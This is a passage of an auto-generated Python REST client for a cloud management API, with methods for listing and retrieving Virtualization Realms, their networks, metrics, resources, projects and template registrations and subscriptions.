:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Subnet], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_unregistered_networks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_unregistered_networks`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/unregistered', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Subnet]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_virtual_machine_count_metrics1(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Virtual Machine Metrics # noqa: E501
Returns metric data for Virtual Machines launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtual_machine_count_metrics1(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_virtual_machine_count_metrics1_with_http_info(id, start, end, **kwargs) # noqa: E501
def get_virtual_machine_count_metrics1_with_http_info(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Virtual Machine Metrics # noqa: E501
Returns metric data for Virtual Machines launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtual_machine_count_metrics1_with_http_info(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'start', 'end', 'interval', 'interval_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_virtual_machine_count_metrics1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_virtual_machine_count_metrics1`") # noqa: E501
# verify the required parameter 'start' is set
if self.api_client.client_side_validation and ('start' not in local_var_params or # noqa: E501
local_var_params['start'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `start` when calling `get_virtual_machine_count_metrics1`") # noqa: E501
# verify the required parameter 'end' is set
if self.api_client.client_side_validation and ('end' not in local_var_params or # noqa: E501
local_var_params['end'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `end` when calling `get_virtual_machine_count_metrics1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'end' in local_var_params and local_var_params['end'] is not None: # noqa: E501
query_params.append(('end', local_var_params['end'])) # noqa: E501
if 'interval' in local_var_params and local_var_params['interval'] is not None: # noqa: E501
query_params.append(('interval', local_var_params['interval'])) # noqa: E501
if 'interval_unit' in local_var_params and local_var_params['interval_unit'] is not None: # noqa: E501
query_params.append(('intervalUnit', local_var_params['interval_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/metrics/virtualmachinecount', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_virtualization_realm(self, id, **kwargs): # noqa: E501
"""Retrieve Virtualization Realm # noqa: E501
Returns a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realm(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullVirtualizationRealm
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_virtualization_realm_with_http_info(id, **kwargs) # noqa: E501
def get_virtualization_realm_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve Virtualization Realm # noqa: E501
Returns a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realm_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullVirtualizationRealm, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullVirtualizationRealm', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_virtualization_realm_resources(self, id, **kwargs): # noqa: E501
"""Retrieve Virtualization Realm Resources # noqa: E501
Returns the back-end resources for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realm_resources(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AbstractCloudResources
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_virtualization_realm_resources_with_http_info(id, **kwargs) # noqa: E501
def get_virtualization_realm_resources_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve Virtualization Realm Resources # noqa: E501
Returns the back-end resources for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realm_resources_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AbstractCloudResources, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_virtualization_realm_resources" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_virtualization_realm_resources`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/resources', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AbstractCloudResources', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_virtualization_realms(self, **kwargs): # noqa: E501
"""List Virtualization Realms # noqa: E501
Returns a collection of the Virtualization Realms that the user manages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realms(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalVirtualizationRealm]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_virtualization_realms_with_http_info(**kwargs) # noqa: E501
def get_virtualization_realms_with_http_info(self, **kwargs): # noqa: E501
"""List Virtualization Realms # noqa: E501
Returns a collection of the Virtualization Realms that the user manages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_virtualization_realms_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalVirtualizationRealm], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_virtualization_realms" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalVirtualizationRealm]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def invalidate_template_cache_in_virtualization_realm(self, id, **kwargs): # noqa: E501
"""Refresh Template Cache # noqa: E501
Forces the back-end Template data to be re-read in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invalidate_template_cache_in_virtualization_realm(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.invalidate_template_cache_in_virtualization_realm_with_http_info(id, **kwargs) # noqa: E501
def invalidate_template_cache_in_virtualization_realm_with_http_info(self, id, **kwargs): # noqa: E501
"""Refresh Template Cache # noqa: E501
Forces the back-end Template data to be re-read in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invalidate_template_cache_in_virtualization_realm_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method invalidate_template_cache_in_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `invalidate_template_cache_in_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_pending_template_subscriptions(self, id, **kwargs): # noqa: E501
"""List Pending Subscriptions # noqa: E501
Returns a collection of the pending Template Subscriptions in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_pending_template_subscriptions(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[FullTemplateRegistrationForSubscription]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_pending_template_subscriptions_with_http_info(id, **kwargs) # noqa: E501
def list_pending_template_subscriptions_with_http_info(self, id, **kwargs): # noqa: E501
"""List Pending Subscriptions # noqa: E501
Returns a collection of the pending Template Subscriptions in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_pending_template_subscriptions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[FullTemplateRegistrationForSubscription], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_pending_template_subscriptions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `list_pending_template_subscriptions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[FullTemplateRegistrationForSubscription]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_projects(self, id, **kwargs): # noqa: E501
"""List Projects # noqa: E501
Returns a collection of the Projects allowed to access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_projects(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalProject]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_projects_with_http_info(id, **kwargs) # noqa: E501
def list_projects_with_http_info(self, id, **kwargs): # noqa: E501
"""List Projects # noqa: E501
Returns a collection of the Projects allowed to access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_projects_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalProject], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_projects" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `list_projects`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/projects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalProject]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_template_registrations(self, id, **kwargs): # noqa: E501
"""List Template Registrations # noqa: E501
Returns a collection of the Template Registrations in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_template_registrations(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalTemplateRegistration]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_template_registrations_with_http_info(id, **kwargs) # noqa: E501
def list_template_registrations_with_http_info(self, id, **kwargs): # noqa: E501
"""List Template Registrations # noqa: E501
Returns a collection of the Template Registrations in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_template_registrations_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalTemplateRegistration], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_template_registrations" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `list_template_registrations`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalTemplateRegistration]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_template_subscriptions(self, id, **kwargs): # noqa: E501
"""List Template Subscriptions # noqa: E501
Returns a collection of the Template Subscriptions in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_template_subscriptions(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalTemplateSubscription]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_template_subscriptions_with_http_info(id, **kwargs) # noqa: E501
def list_template_subscriptions_with_http_info(self, id, **kwargs): # noqa: E501
"""List Template Subscriptions # noqa: E501
Returns a collection of the Template Subscriptions in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_template_subscriptions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalTemplateSubscription], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_template_subscriptions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
